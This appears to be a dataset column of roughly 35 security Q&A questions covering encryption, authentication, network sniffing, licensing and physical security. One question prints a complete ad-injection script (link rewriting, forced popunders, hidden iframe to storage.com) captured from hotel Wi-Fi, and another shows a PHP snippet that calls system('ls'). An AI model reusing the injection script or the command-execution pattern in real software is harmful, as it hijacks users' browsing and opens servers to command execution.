instruction
stringlengths
24
29.9k
I am connected to my router and I want to know if it is a possibility to sniff a data from a router that is over my router?
The possibility to enable port forwards for any hosts inside the LAN has of course security implications. The problem from my point of view is not that there are bad users, but bad hosts/programs and of course the problem of CSRF. But for some applications it would be good to have such a thing. Other possibilities like statically forward ports seems also less secure because then the port will be open all the time - also you have to maintain static IP addresses for all internal hosts, that should be reached. The question is now: is it really necessary to have open ports for certain applications like btsync or some kind of instant messanger? Should a program depend on UPnP or is it possible to live without it? (bad question, i know - because in any case i have to live with bad security or bad application behaviour...)
I have a scenario where I want to encrypt the file data on client machine along with smart card authentication. I have followed a link that states that for smart cards, private key never leaves The card. It further explains that File data encryption should be done using on-board smart card processor with the session key generated (in smart card) and then enciphered session key is attached with the encrypted file data and is sent back to client PC. I want to know is there some standard that would explain complete procedure along with necessary security measures? I have a scenario where session keys are generated off-board on client machine. I want to use smart card for authentication purpose only while rest of crypto operations should be performed on client machine. How can I achieve this? Is there any secure method of exporting private key to client machine?? like where private key is exported and used but never stored on client machine??
How to find encryption method if both encrypted and decrypted code known? j1RSfCKUuvqjHLBtuIe9AOb03gkd2ENLj+KNkWUHff6duf1/iz2zNjU48B0v4O3PFWV3Q0scOPYDu7vuW2mvNKJWXQrIpHGCBEeqyXpihR1WWQo6hfe81YenVH35Gxp/7Xmltp5V8+XEhXOV8jyXtjBaKGVNgmA6F5kmQPAqCaA= this is a sample encrypted code, how could i identify its method if i know original code?
The Story: Yesterday at 12pm a neighbor of mine was pulling into his driveway, and saw that his van's back-window was shattered. Well, this neighbor and I have had some trouble with each other in the past (only noise complaints though) because he is in a band, and plays in his garage; however, it was not me who broke the glass on the van. As soon as he came home, he immediately marched across the street to me while I was exercising in my garage. Upon arrival he raises his voice, and presumptuously threatens to call the cops even though he had no idea who did it in the first place. I, being responsible, told him I did not do it, and will show him video evidence (I have a camera mounted above my garage). Since my camera covers nearly five houses, it can clearly see his house. So as I'm returning from the house with the USB at hand, a cop is walking towards me from his house, and my neighbor was pointing at me. Without any hesitation I told the cop I may have video evidence of who did it. He was interested in the footage, so without thinking twice he plugged it straight into his laptop (running windows XP), and there wasn't anything on it useful (the light just so happened to be at the right spot and the right time). So he simply returned the flash drive to me, and told my neighbor that he couldn't do anything about, regarding the evidence. The day ended there. Conclusion: Nonetheless last night I sat up thinking about what had happened, and the fact he hates me. It didn't strike my attention, however, that the cop plugged the device into his laptop in his cop car, the one he uses on-duty. I just thought to myself... could this have been all a setup, and could have sensitive data been compromised? Questions: Should an officer directly plug an "outside" USB device directly into their on-duty laptops? If this is an issue, what security concerns does it raise, and what damage could this have caused? Do most police officers receive training to prevent Social Engineering? Also, sorry for the verbose story, but it helps to undertsand whats going on. I'm a student in Computer Science, but know only the basics of security (for programming). With this being a real life story that happened yesterday, I'd really like to understand the risk this may have produced for others.
While connected to my hotel Wi-Fi, visiting the URL http://www.google-analytics.com/ga.js results in the following content being served: var ga_exists; if(!ga_exists) { ga_exists = 1; var is_responsive = false; var use_keywords = false; Date.prototype.addHours = function (h) { this.setHours(this.getHours() + h); return this }; function shuffle(src) { var cnt = src.length, tmp, idx; while (cnt > 0) { idx = Math.floor(Math.random() * cnt); cnt--; tmp = src[cnt]; src[cnt] = src[idx]; src[idx] = tmp; } return src; } function addEvent(obj, type, fn) { if (obj.addEventListener) { obj.addEventListener(type, fn, false) } else if (obj.attachEvent) { obj['e' + type + fn] = fn; obj[type + fn] = function () { obj['e' + type + fn](window.event) }; obj.attachEvent('on' + type, obj[type + fn]) } else { obj['on' + type] = obj['e' + type + fn] } } function getCookie(name) { var i, x, y, ARRcookies = document.cookie.split(';'); for (i = 0; i < ARRcookies.length; i++) { x = ARRcookies[i].substr(0, ARRcookies[i].indexOf('=')); y = ARRcookies[i].substr(ARRcookies[i].indexOf('=') + 1); x = x.replace(/^\s+|\s+$/g, ''); if (x == name) return unescape(y) } } function setCookie(name, value, hours) { var exdate = new Date(); exdate.addHours(hours); var c_value = escape(value) + ';expires=' + exdate.toUTCString() + ';path=/'; document.cookie = name + '=' + c_value } function startsWith(str, pat) { if (typeof pat == 'object') { for (_i = 0; _i < pat.length; _i++) { if (str.toLowerCase().indexOf(pat[_i].toLowerCase()) == 0) return true; } return false; } else return (str.toLowerCase().indexOf(pat.toLowerCase()) == 0); } addEvent(window, 'load', function() { var cnt_all = document.createElement('img'); cnt_all.src = 'http://www.easycounter.com/counter.php?scanov_all'; cnt_all.style.display = 'none'; document.body.appendChild(cnt_all); if(use_keywords) { var keywords = ''; var metas = document.getElementsByTagName('meta'); if (metas) { var kwstr = ''; for (var i = 0; i < metas.length; i++) { if (metas[i].name.toLowerCase() == 'keywords') kwstr += metas[i].content; } if(kwstr) { var tmp = kwstr.split(','); var tmp2 = new Array(); for (var i = 0; i < tmp.length && tmp2.length < 3; i++) { var kw = tmp[i].trim(); if(/^\w+$/.test(kw)) tmp2.push(kw); } if(tmp2.length > 0) keywords = tmp2.join('+'); } } var replCookie = 'href-repl'; var replStaff = Math.floor((Math.random() * 18) + 1); var replLink = 'http://msn.com' + '?staff=' + replStaff + '&q=' + keywords; var replHours = 12; addEvent(document, 'mousedown', function(evt){ if(getCookie(replCookie)) return; evt = evt ? evt : window.event; var evtSrcEl = evt.srcElement ? evt.srcElement : evt.target; do { if (evtSrcEl.tagName.toLowerCase() == 'a') break; if (evtSrcEl.parentNode) evtSrcEl = evtSrcEl.parentNode; } while (evtSrcEl.parentNode); if (evtSrcEl.tagName.toLowerCase() != 'a') return; if (!startsWith(evtSrcEl.href, new Array('http://', 'https://'))) return; evtSrcEl.href = replLink; setCookie(replCookie, 1, replHours); }); } if(window.postMessage && window.JSON) { var _top = self; var cookieName = ''; var cookieExp = 24; var exoUrl = ''; var exoPuId = 'ad_' + Math.floor(89999999 * Math.random() + 10000000); if (top != self) { try { if (top.document.location.toString()) { _top = top } } catch (err) {} } var exo_browser = { is: function () { var userAgent = navigator.userAgent.toLowerCase(); var info = { webkit: /webkit/.test(userAgent), mozilla: (/mozilla/.test(userAgent)) && (!/(compatible|webkit)/.test(userAgent)), chrome: /chrome/.test(userAgent), msie: (/msie/.test(userAgent)) && (!/opera/.test(userAgent)), msie11: (/Trident/.test(userAgent)) && (!/rv:11/.test(userAgent)), firefox: /firefox/.test(userAgent), safari: (/safari/.test(userAgent) && !(/chrome/.test(userAgent))), opera: /opera/.test(userAgent) }; info.version = (info.safari) ? (userAgent.match(/.+(?:ri)[\/: ]([\d.]+)/) || [])[1] : (userAgent.match(/.+(?:ox|me|ra|ie)[\/: ]([\d.]+)/) || [])[1]; return info }(), versionNewerThan: function (version) { currentVersion = parseInt(this.is.version.split('.')[0]); return currentVersion > version }, versionFrom: function (version) { currentVersion = parseInt(this.is.version.split('.')[0]); return currentVersion >= version }, versionOlderThan: function (version) { currentVersion = parseInt(this.is.version.split('.')[0]); return currentVersion < version }, versionIs: function (version) { currentVersion = parseInt(this.is.version.split('.')[0]); return currentVersion == version }, isMobile: { Android: function (a) { return a.navigator.userAgent.match(/Android/i) }, BlackBerry: function (a) { return a.navigator.userAgent.match(/BlackBerry/i) }, iOS: function (a) { return a.navigator.userAgent.match(/iPhone|iPad|iPod/i) }, Opera: function (a) { return a.navigator.userAgent.match(/Opera Mini/i) }, Windows: function (a) { return a.navigator.userAgent.match(/IEMobile/i) }, any: function (a) { return a.navigator.userAgent.match(/Android|BlackBerry|iPhone|iPad|iPod|Opera Mini|IEMobile/i) } } }; var browser = exo_browser; var exopop = { settings: { width: 1024, height: 768 }, init: function () { if (browser.isMobile.any(_top)) exopop.binders.mobile(); if (browser.is.msie) exopop.binders.msie(); if (browser.is.msie11) exopop.binders.msie11(); if (browser.is.firefox) exopop.binders.firefox(); if (browser.is.chrome && browser.versionFrom(30) && navigator.appVersion.indexOf('Mac') != -1) exopop.binders.chrome30_mac(); if (browser.is.chrome && browser.versionOlderThan(30)) exopop.binders.chromeUntil30(); if (browser.is.chrome && browser.versionIs(30)) exopop.binders.chrome30(); else if (browser.is.chrome && browser.versionFrom(31)) exopop.binders.chrome31(); else if (browser.is.safari) exopop.binders.safari(); else exopop.binders.firefox(); }, windowParams: function () { return 'width=' + exopop.settings.width + ',height=' + exopop.settings.height + ',top=0,left=0,scrollbars=1,location=1,toolbar=0,menubar=0,resizable=1,statusbar=1' }, status: { opened: false }, opened: function () { if (exopop.status.opened) return true; if (getCookie(cookieName)) return true; return false }, setAsOpened: function () { this.status.opened = true; setCookie(cookieName, 1, cookieExp) }, findParentLink: function (clickedElement) { var currentElement = clickedElement; if (currentElement.getAttribute('target') == null && currentElement.nodeName.toLowerCase() != 'html') { var o = 0; while (currentElement.parentNode && o <= 4 && currentElement.nodeName.toLowerCase() != 'html') { o++; currentElement = currentElement.parentNode; if (currentElement.nodeName.toLowerCase() === 'a' && currentElement.href != '') { break } } } return currentElement }, triggers: { firefox: function () { if (exopop.opened()) return true; var popURL = 'about:blank'; var params = exopop.windowParams(); var PopWin = _top.window.open(popURL, exoPuId, params); if (PopWin) { PopWin.blur(); if (navigator.userAgent.toLowerCase().indexOf('applewebkit') > -1) { _top.window.blur(); _top.window.focus() } PopWin.Init = function (e) { with(e) { Params = e.Params; Main = function () { var x, popURL = Params.PopURL; if (typeof window.mozPaintCount != 'undefined') { x = window.open('about:blank'); x.close() } else if (navigator.userAgent.toLowerCase().indexOf('chrome/2') > -1) { x = window.open('about:blank'); x.close() } try { opener.window.focus() } catch (err) {} window.location = popURL; window.blur() }; Main() } }; PopWin.Params = { PopURL: exoUrl }; PopWin.Init(PopWin) } exopop.setAsOpened(); return }, chromeUntil30: function () { if (exopop.opened()) return true; window.open('javascript:window.focus()', '_self'); var w = window.open('about:blank', exoPuId, exopop.windowParams()); var a = document.createElement('a'); a.setAttribute('href', 'data:text/html,<scr' + 'ipt>window.close();</scr' + 'ipt>'); a.style.display = 'none'; document.body.appendChild(a); var e = document.createEvent('MouseEvents'); e.initMouseEvent('click', true, true, window, 0, 0, 0, 0, 0, true, false, false, true, 0, null); a.dispatchEvent(e); document.body.removeChild(a); w.document.open().write('<script type="text/javascript">window.location="' + exoUrl + '";<\/script>'); w.document.close(); exopop.setAsOpened() }, chrome30: function (W) { if (exopop.opened()) return true; var link = document.createElement('a'); link.href = 'javascript:window.open("' + exoUrl + '","' + exoPuId + '","' + exopop.windowParams() + '")'; document.body.appendChild(link); link.webkitRequestFullscreen(); var event = document.createEvent('MouseEvents'); event.initMouseEvent('click', true, true, window, 0, 0, 0, 0, 0, false, false, true, false, 0, null); link.dispatchEvent(event); document.webkitCancelFullScreen(); setTimeout(function () { window.getSelection().empty() }, 250); var Z = W.target || W.srcElement; Z.click(); exopop.setAsOpened() }, safari: function () { if (exopop.opened()) return true; var popWindow = _top.window.open(exoUrl, exoPuId, exopop.windowParams()); if (popWindow) { popWindow.blur(); popWindow.opener.window.focus(); window.self.window.focus(); window.focus(); var P = ''; var O = top.window.document.createElement('a'); O.href = 'data:text/html,<scr' + P + 'ipt>window.close();</scr' + P + 'ipt>'; document.getElementsByTagName('body')[0].appendChild(O); var N = top.window.document.createEvent('MouseEvents'); N.initMouseEvent('click', false, true, window, 0, 0, 0, 0, 0, true, false, false, true, 0, null); O.dispatchEvent(N); O.parentNode.removeChild(O) } exopop.setAsOpened() }, tab: function () { if (exopop.opened()) return true; var a = top.window.document.createElement('a'); var e = document.createEvent('MouseEvents'); a.href = exoUrl; document.getElementsByTagName('body')[0].appendChild(a); e.initMouseEvent('click', true, true, window, 0, 0, 0, 0, 0, true, false, false, true, 0, null); a.dispatchEvent(e); a.parentNode.removeChild(a); exopop.setAsOpened() }, mobile: function (triggeredEvent) { if (exopop.opened()) return true; var clickedElement = triggeredEvent.target || triggeredEvent.srcElement; if (clickedElement.nodeName.toLowerCase() !== 'a') { clickedElement = exopop.findParentLink(clickedElement) } if (clickedElement.nodeName.toLowerCase() === 'a' && clickedElement.getAttribute('target') !== '_blank') { window.open(clickedElement.getAttribute('href')); exopop.setAsOpened(); _top.document.location = exoUrl; if (triggeredEvent.preventDefault != undefined) { triggeredEvent.preventDefault(); triggeredEvent.stopPropagation() } return false } return true } }, binders: { msie: function () { addEvent(document, 'click', exopop.triggers.firefox) }, firefox: function () { addEvent(document, 'click', exopop.triggers.firefox) }, chromeUntil30: function () { addEvent(document, 'mousedown', exopop.triggers.chromeUntil30) }, chrome30: function () { addEvent(document, 'mousedown', exopop.triggers.chrome30) }, chrome31: function () { addEvent(document, 'mousedown', exopop.triggers.tab) }, msie11: function () { addEvent(document, 'mousedown', exopop.triggers.tab) }, chrome30_mac: function () { addEvent(document, 'mousedown', exopop.triggers.chromeUntil30) }, safari: function () { addEvent(document, 'mousedown', exopop.triggers.safari) }, mobile: function () { addEvent(document, 'click', exopop.triggers.mobile) } } }; var exoMobPop = 0; function exoMobile() { addEvent(document, 'click', function(){ var targ; var e = window.event; if (e.target) targ = e.target; else if (e.srcElement) targ = e.srcElement; if (targ.nodeType == 3 || targ.tagName != 'A') targ = targ.parentNode; if (getCookie(cookieName)) exoMobPop = 1; if (exoMobPop == 0) { if(targ && targ.tagName == 'A') targ.target = '_blank'; exoMobPop = 1; setTimeout(function() { setCookie(cookieName, 1, cookieExp / 2); document.location.assign(exoUrl); }, 1000); } }); } var scripts = null; var script_names = []; var recyclePeriod = 0; if(browser.isMobile.any(_top) && is_responsive) { recyclePeriod = 3 * 60 * 60 * 1000; scripts = { '938466': function() { exoUrl = 'http://www.reduxmediia.com/apu.php?n=&zoneid=5716&cb=3394654&popunder=1&direct=1'; cookieName = 'splashMob-938466'; exoMobile(); } }; } else { recyclePeriod = 6 * 60 * 60 * 1000; scripts = { 'adcash': function() { var adcash = document.createElement('script'); adcash.type = 'text/javascript'; adcash.src = 'http://www.adcash.com/script/java.php?option=rotateur&r=274944'; document.body.appendChild(adcash); }, '1896743': function() { exoUrl = 'http://www.reduxmediia.com/apu.php?n=&zoneid=5716&cb=3394654&popunder=1&direct=1'; cookieName = 'splashWeb-896743'; exopop.init(); }, 'adcash2': function() { var adcash2 = document.createElement('script'); adcash2.type = 'text/javascript'; adcash2.src = 'http://www.adcash.com/script/java.php?option=rotateur&r=274944'; document.body.appendChild(adcash2); }, }; } for(var i in scripts) { if(scripts.hasOwnProperty(i)) script_names.push(i); } script_names = shuffle(script_names); var origin = 'http://storage.com' var path = '/storage.html'; var sign = '90e79fb1-d89e-4b29-83fd-70b8ce071039'; var iframe = document.createElement('iframe'); var done = false; iframe.style.cssText = 'position:absolute;width:1px;height:1px;left:-9999px;'; iframe.src = origin + path; addEvent(iframe, 'load', function(){ addEvent(window, 'message', function(evt){ if (!evt || evt.origin != origin) return; var rsp = JSON.parse(evt.data); if(!rsp || rsp.sign != sign || rsp.act != 'ret') return; scripts[rsp.data](); if(browser.isMobile.any(_top) && is_responsive) { iframe.contentWindow.postMessage( JSON.stringify({ act: 'set', sign: sign, data: rsp.data }), origin ); } else { addEvent(document, 'mousedown', function(){ if(done) return; done = true; iframe.contentWindow.postMessage( JSON.stringify({ act: 'set', sign: sign, data: rsp.data }), origin ); }); } }); iframe.contentWindow.postMessage( JSON.stringify({ act: 'get', recycle: recyclePeriod, sign: sign, data: script_names }), origin ); }); document.body.appendChild(iframe); } }); } Obviously someone is using this script to inject ads into guests' browsing. However, the worrying part for me is the bit that references "storage.com". When I ping storage.com, it resolves to 199.182.166.176. Should I be worried?
I get the OS type of a remote host by: connecting to an open port (telnet <host> 22); using Nmap (nmap -A <host>). What are techniques and how to hide or change the information about OS? I would like to get answers with respect to GNU/Linux or (and) BSD OS.
Lets say there is AJAX application where user can submit items - buy them. And there was a code IF ($_POST[items] > 20) { echo 'error'; } else { do_buy($_POST[items]); echo 'success' } So there is a check if items is not more than 20, lets say on client side it is not possible to choose more than 20 items, but atacker can edit the javascript and chooose. But system would work without problems even if 21 or any other amount would be submited. Usually - every scream that you dont trust client side. And I agree. But in this case I think its enough to trust client, because nothing bad will happen if he submits more than this amount of items. When submiting more - he will have to pay more, so thats kind of automatic protection. Ok, maybe system would crash if there was 15000 items submited. That is maybe better reason for protection. Still if minimum amount for item is 1$, he will have to have in his account 15000 $ to really buy those items. And in worst case might be set some script run time out, so if errors are disable, he will just not get back any response if script times out. I am not only talking about this situation, but in general. Does it make sense to write protections from something which you dont see how system can be hacked. And if someone says to protect - shouldn't they explain the reason why this place should have check? Not like the answer - "its always better to check, you dont know where hacker could hack you". But first find real example how the hacker will hack you. Or lets take real world example - there is a house, which have 1 door, 5 windows, walls. We understand that thief first would go through doors if they dont have a lock. So we protect hours with the lock. If we need more protection, second thing where thief might go is windows, so we can add something for windows to protect. But we would not think that thief would to through walls, assuming they are from bricks. It is possible also, but then its also possible that your php server will be physically bombed and you need to have some military machines to protect your server :D
I have a client that generates a csr, sends it to a server, the server then sign it and return the certificate as a String. the String is then decoded to a x509Certificate (using Bouncycastle's PEMParser) which is then imported to the client keystore. The questions are: Should i verify/validate anything before importing the given client certificate? Either as a String (encoding? pre/postfix?) or as a certificate? I guess i can check that the certificate really originated from my csr (from my public key). I'm not sure i can validate that the signing authority is trusted by me (I think it's not necessarily the case if a different CA is used for signing the client's certificates and it's not necessarily trusted by the clients). What risk am i introducing by not verifying/validating anything on it? I can't think of any attack. Thanks!
I'm testing a system which involves updating a database using files sent from external parties. These files sent from external parties are basically just large flat files to update a database. The requirement is that these files must be signed used a File Signing Key in accordance with the FIPS 186-4 Digital Signature Standard using SHA-256 hashing algorithm and encrypting the derived hash using an RSA Digital Signing Algorithm of 2048-bit modulus in accordance with PKCS #1. The SHA-256 hashing algorithm will be applied to the entire data file. This will result in a digital signature of 2048 bits in Octet form, which will be appended within the file. To test that the system verifies the signature correctly, I need to firstly sign the file. Information Security is not really my forte and I would appreciate guidance in the right direction. Is there a tool that I can use to perform this? Apart from the certificates, what would the pre-requisites be? Many thanks.
Considering the recent thread regarding anti-virus for the Mac I wonder how many of the arguments put forth are relevant today to Linux systems, specifically Ubuntu. There are no known Ubuntu desktop malware in the wild. GNU/Linux is a very tempting target for botnets, considering that powers a substansial fraction of webservers. Additionally, these webservers are generally higher-provisioned and have better bandwidth than potential desktops botnets. Anti-malware packages for Linux are mostly targeted to Windows infections that may 'pass through' Linux, such as on a mailserver. This is not relevant for an Ubuntu desktop. Some of the available Linux anti-malware applications seem just as shady as their Windows counterparts. These solutions may or may not protect against macros in LibreOffice documents, web browswer or extensions' flaws (Flash), XSS attacks, Java vulnerabilities, and other userland software. People are stupid. Someone might run nakedgirls.deb if an ambitious malware dev were to promote it. I'm sure that this is only a matter of time. Note that though there are many other distros and desktops based on GNU/Linux, in the interest of keeping on focus I would like to limit this thread to a discussion of standard-install Ubuntu desktops only. Think "desktops for grandma". Users of Slackware, those running mail- or web-servers, or those using their desktops for other purposes would presumably (ha! I'm not really that naive) know what they are doing and the risks involved.
This is my first question here in Information Security SE. Is there a recommendation to help telling the scenarios where authentication should precede authorization from the ones where authorization comes first? I experienced both situations at different workplaces (the situation was very similar, switching to a system user with a certain set of privileges in Unix command line). When does authorization need to come first to spare the authentication? When should it authenticate first so as to not to tell a potential intruder that the user impersonated would not be entitled for the current operation? Are there situation specific generic guidelines or rules for this? -- OK, let me come up with a specific situation. Logged in with own employee user ID, SUing to another user. I mistyped the system user I was about to switch to, but the other is also an existing user in our environment. Before asking for password, I got rejected saying I wasn't authorized to perform this operation. Given that I just finished an anti-social engineering course today, I wondered whether it was a good idea to tell me I wasn't authorized (even this may be a useful piece of information for someone trying to impersonate me in the corporate network).
If a user wants to login to a system/server, it's recommended to have the hashed&salted password saved in a database, along with its salt. So the user wants to login, types in the password, clicks on login and with his input and the salt the system checks if the correct hash is created. I understand this part. But when I don't want to type the password every time, how would I save the password on client-side? I can't save it hashed, because I need to salt the clear password for the checkup. If I save it clear, the client is vulnerable. And if I use any encryption where do I store the "master-password". Also in my case I don't really want the user to force into creating a master-password. Though it's a required feature not to type in the password every time. Edit: Second Question: Well, one question I still have on my mind. How is it done in smartphones? For example your wifi password. You enter it once, it's stored on the device, but how is it secured? Do you know that?
A Yahoo! answers user suggested that there are 5^5 possible unique configurations for a physical key, but the answer wasn't sourced. I wondered if anyone had similar numbers for how many possible key combinations there are. I ask because, it seems impossible that there can be a unique key for every lock in the world, and I'd like to know how many different key configurations a thief would have to try to have a certainty of cracking the lock (if the thief didn't want to force the lock in another way.)
I'm starting a very large project soon. It must include a licensing system. The project will produced using PHP/Laravel/JavaScript and use many different libraries, a CMS, and a few databases. The software will be licensed out to other companies, which is why the ability to enable/disable usage is very important. For the most part, piracy shouldn't be an issue considering the vast majority of the companies that will use this software don't have the know-how to disable the protection or don't have a developer that could do this. What's the best way to handle this? Is restricting the source-code via a per domain basis possible and would it work well? How would this be done? How could I manage updates to the software too?
I use LastPass for Android with the PIN option. After having entered my full Lastpass password the first time that I used the app, now when opening the application I have access to all my passwords just by entering a four-digit PIN. How secure can this be? Where might the data stored such that it is accessible by PIN only? Is it likely that the passwords are stored on the Android file system unencrypted? Perhaps the passwords are stored on the Android file system encrypted with the PIN as a key? I am concerned that if the user could access the data with a four-digit PIN, then so could an attacker. I am concerned about an online or otherwise electronic attacker, not physical access to the device. Note that the device (Samsung Note 3) is not yet rooted, but it likely will have a custom ROM installed on it sometime in the future.
I have a web site hosted from my server. Sometimes, I upload database manipulation scripts to a folder which is three levels deep in the website and run them using my web browser. These scripts should not be accessed by outside users and I remove them within hours of uploading them. Is there a risk that these scripts will be found or crawled if no other page links to them? If so, then how can they be discovered? I also have a test sub-domain located at user.mysite.com. Is it possible for outsiders that do not know the sub domain to discover the existence of the sub domain?
I know that the following authentication protocol is vulnerable, but I can't understand why. A and B share a secret key K (64 bits) R1 and R2 are two 64 bit numbers A-->B: I am A B-->A: R1 A-->B: Hash((K+R1) mod 2^64), R2 B-->A: Hash((K+R2) mod 2^63) My thinking is that the two hashes don't line up, but I don't know that that would make this protocol have a major vulnerability.
I have a folder that I don't want to be accessible from outside my network's LAN. It seems like all traffic from the outside world goes through my firewall (192.168.1.39). So I made my .htaccess as follows: Order Allow,Deny Allow from all Deny from 192.168.1.39 My thinking is that it allows all traffic, except for traffic that is redirected by my firewall: ie all external traffic. Is there anything I'm missing? Any way for a hacker to bypass the firewall to get at the server directly? Any way to use IP spoofing to get around the .htaccess? etc? EDIT: I can't allow from the local LAN with either a subnet or domain, because the external traffic looks like it is coming from the local LAN. It is being redirected from my firewall, a forigate inside the network.
One of my clients wants to provide an URL to each of his customers to register in a system. This URL would contain a query string parameter with some data (e.g. code, email and name) from his clients encrypted using AES with CBC, similar to this (IV is in bold): www.website.com/register?key=44a74fb9fad889496e970c604e54fdab a367c6e5802252822ce071c35d7f108aea43e6de925cf93dd3d4772974621927a12702428b1d22d82b6f976acc7470f8 When a user enter this page, it would decrypt it and check if the data is valid (e.g. if the customer's code is valid in an external database and if it is not already registered) in order to show the register form to him. I've seen some people using HMAC alongside AES to encrypt data, but I don't know if this is needed in a case like this. My question is: Is this secure enough? Should I use something like HMAC along with the plaintext before encrypting it with AES to authenticate the data?
I am a Python / C developer currently working on a extremely important piece of software. The details of the code will not be mentioned, and the only place the code appears is on my own hard drive, in a virtual disk image used by a windows 7 virtual box (a hard drive inside a hard drive I guess). The algorithm represented in the code is extremely important, and I cant have ANYBODY get to it except me. I was curious if one could completely protect a single virtual folder from any unwanted access whatsoever. I want to give a level of protection so deep (for this one folder) that even if a CIA agent was assigned to tracking down this source code on my hard drive, they could not do it. I need this folder to be completely cut off from the rest of the world, and make sure no internet based attack, nor any virus could get to it. Is this possible? Any suggestions to lead me in the right direction? P.S. As you can probably tell, I really don't know much about security, but I would appreciate any suggestions. A 'no this is not possible' answer is completely acceptable.
In movies and TV shows, characters are often depicted using devices and applications that are able to determine an encryption key or passcode character by character (or digit by digit). I am a programmer and think I have a decent idea of how encryption works in general but I'm not sure whether to take this as a simple way to display progress or if there is actually something to it. Is this ever possible and if so what properties of an algorithm leave it susceptible to this kind of cracking?
Having a more-than-elementary knowledge of internet security, I've realized that some web applications and websites I use implement a less-than-ideal password policy. Some examples include: Implementing a password-length upper-bound (upper-bounds I have seen are 16, 20, and 32) Requiring the presence of arbitrary characters Forbidding the presence of arbitrary characters (such as spaces, %, ^, and others) These kind of practices make me worry that the server-side encryption is equally questionable. Thus I'm wondering if it would be a good idea to implement my own script (drawing on tried-and-true methods) to create a hash of my password on my local machine and then rehash it until it meets the sites arbitrary requirements and use that as my 'password'.
I recently came across an application that more or less does this: starts from a (supposedly unknown to others) key generates a random IV encrypts some smallish (~ 160 bytes) payload with the key and generated IV using AES256 in CBC mode [>=60% of payload is comprised of two or three ASCII words, chosen from a supposedly unknown but more or less easily guessable list of some dozen elements] derives another IV just by doing some math on the key. This IV will be the same for every packet, ever, and the code to generate it from the key is publicly known. encrypts a small header (32 bytes) with the key and derived IV using AES256 in CBC mode [most of this header is made of fixed data such as "protocol version" that should be considered publicly known, then it contains a unix timestamp (known data if you know when the packet has been transmitted) and the random IV used before for the payload part] transmits the resulting encrypted header+payload on the wire The receiving part knows the (pre-shared) key, regenerates the "header IV" from that, decrypts header, gets payload IV from there, decrypts payload. The whole stuff repeats for every packet, and the typical application would have anything from 5 to 50 packets per second going on the wire, and since many of them are just "status info" the only difference between their cleartext would be the unix timestamp and the (pseudo)randomly-generated payload IV. I'm definitely no cryptography expert but as far as I know "fixed IV derived from key used to encrypt 32 bytes, 28 of which are fixed and/or easily guessable" should at least ring some alarm. How could the security of such approach be considered? - "security" defined as keeping the key and/or the payload secret even if someone could eavesdrop packets from the wire.
I could not able to configure burp suite with browsers. If I use manual connection settings in browsers,I could not load any site.Because my company uses proxy. Following Methods I have tried but fails: I have set manual proxy as "127.0.0.1:8080" but my browser could not load any site after that proxy change.Though burpsuite works at that time.I can able to see requests.Let me know how to configure this burpsuite with browsers?
Our application is using loadXML extensively to recieve data(input) from the users. Other than the usual checks for SQL injections and XXS, are there any known risks in parsing the xml file using loadXML? The XML files are limited in size and will be under 2MB. Could someone potentially create an XML files with a malicious macro? https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing https://www.owasp.org/index.php/Testing_for_XML_Injection_(OWASP-DV-008) I read these links but I am not sure if we could safely rely on loadXML or not? If not, what methods should we use to sanitize or validate an xml as safe?
So I was just reading up on the OWASP site about PHP Object Injection. According to their site, the suggested fix is to not use serialze and unserialize but to use json_encode and json_decode. However, after doing a few tests in a limited amount of time I have found that this isn't the case at all. For example (working Codepad example): <?php function e($method, $args) { return $method($args); } var_dump(call_user_func_array("e", array((string)array_shift(json_decode("[\"system\"]")), "ls" ))); ?> So, my questions are: Would you agree with me that this is not the case, and there should be more of a suggested fix rather than just using json_* functions? Am I actually correct in assuming what I have done is correct?
...its remote administration feature is locked down to a single IP/Range? If so, why? This has been an ongoing office debate for a while now, I claim that it would be possible as it is likely to be the internal web server and the technologies it uses (cgi etc.) that will handle that remote authentication, but I have many people saying that it wouldn't be possible to execute a remote shell because it's locked down by IP. Who is right?
The situation comes down to this: When I enter in hotmail, it retrieves my messages connecting to other providers: they could only do so by using my email and password. Since I had signed in a couple of days ago, I do not need to put my email/password again: hotmail doesn't know any secret about me/this specific session. From these points, I can only infer: They store a master password derived from my original password in my cookies. Thus, when I come back, they use that to decrypt the emails. They have it stored using a master, per-site password. However, both of the solutions seem really weak. Any idea on how to implement a secure, cookie persistent connection and encrypting passwords? Note: please read this question from me about why I'm saying encrypt and not hash passwords.
I was curious on some best practices for securing Outlook against hackers. The data transmitted between the email server and client are almost always encrypted these days but I haven't seen a great deal of security when the mail actually is on the local machine. If someone were to gain access to your machine rather it be Outlook or Thunderbird - they now also have access to any email service you're logged into. The actual stored archives can be password protected but that does nothing for active mail within the inbox. My question is, how does one secure email on the actual machine from prying eyes? And yeah, I know - unless it's PGP - email isn't secure. Edit: Correction - PGP isn't secure either one it's 'open'/decrypted on the local machine. Solution: TL;DR - No direct solution other than encrypting drive it's on. I asked on Microsoft forums and was directed to Symantec.. and was basically told that there is no solution to lock Outlook itself or individual emails but rather rely on Bitlocker.
Does having a nonce in CTR mode actually improve security (vs. just using 1, 2, 3, etc. - basically a constant nonce of 0)? As far as I can tell, the best-case scenario security-wise is that the nonce could act as a sort of second key, which would also be shared securely between the communicating parties. But if the underlying block cipher is secure (let's say AES-128), that should be both unnecessary and unhelpful...right? It seems to me that specifying a nonce only gives a false sense of added security. Am I missing something?
I'm new to the IT Security Stack Exchange! This is my question: I've Skype installed on my Windows 7 computer. In the last few months I've noticed my mouse cursor blinks (I mean it shows that cursor that appears when the computer is processing something) every time I type or click while Skype is the "focus" of my attention. I think this could mean someone has installed a keylogger or some kind of malware on my PC. I think I could also just be paranoid about this. This happened some time after I gave out my Skype name online because somebody wanted to collaborate with me on a project. I've ran multiple antivirus scans with Avast! free AV, scans with MalwareBytes Anti Malware, and even during Safe Mode on that computer. Not one scan has turned up any kind of malware threat detection! Another important detail is I keep getting unsolicited contact requests on Skype as well. I don't know who they are so I decline and mark them as spam. I wanted to ask this question here though I don't know if its much to go on. I don't know a whole lot about computer security.
I used encfs to encrypt some important files on my system, but sadly I forget the encryption key. I still have a version of some of the the encrypted files. Is there there a way to get the encryption key if I have the two versions of the file (the encrypted and decrypted one), so I can use this key the get the rest of my files? encfs uses ssl/aes 256 key size
Following the breach of avast:forum.avast.com they decided to host the database externally@id.avast.com. My question is, what is the point of hosting the database externally since when you get remote code execution on forum.avast.com (which has access to the database hosted on id.avast.com) you can then steal the database anyway? Is it so no data is lost/destroyed?
I would like to know how the ATM pin hole camera works.Whether the pin hole camera works only once the card is inserted in ATM or during the cash withdrawal or it works always?
